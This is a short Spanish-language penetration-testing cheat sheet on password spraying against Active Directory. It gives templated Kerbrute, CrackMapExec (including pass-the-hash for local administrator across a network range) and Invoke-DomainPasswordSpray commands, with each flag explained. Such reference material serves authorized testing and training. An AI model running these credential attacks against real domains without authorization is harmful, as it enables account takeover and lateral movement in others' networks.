Password spraying

Linux/Unix

Kerbrute

kerbrute passwordspray -d <ACME.LOCAL> --dc <IP-address-DC> <path-users> <password>

  • passwordspray = prueba de una sola contraseña contra una lista de usuarios.

  • -d = dominio.

  • --dc = controlador de dominio.

    • <IP-address-DC> = dirección IP del controlador de dominio.

  • <path-users> = ruta de archivo con listado de usuarios.

  • <password> = contraseña.

CrackMapExec

Active Directory

crackmapexec smb <IP-address-DC> -u <path-users> -p <password> | grep +

  • <IP-address-DC> = dirección IP del controlador de dominio.

  • -u = usuarios.

    • <path-users> = ruta de archivo con listado de usuarios.

  • -p = contraseña.

    • <password> = contraseña.

Administrador local

crackmapexec smb --local-auth <CIDR> -u administrator -H <hash> | grep +

  • <CIDR> = Classless Inter-Domain Routing.

  • <hash> = hash de contraseña del usuario administrator.

Windows

DomainPasswordSpray

Invoke-DomainPasswordSpray -Password <password> -OutFile domain-password-spray.txt -ErrorAction SilentlyContinue
AnteriorEnumeración de política de contraseñasSiguienteEnumeración autenticada

Última actualización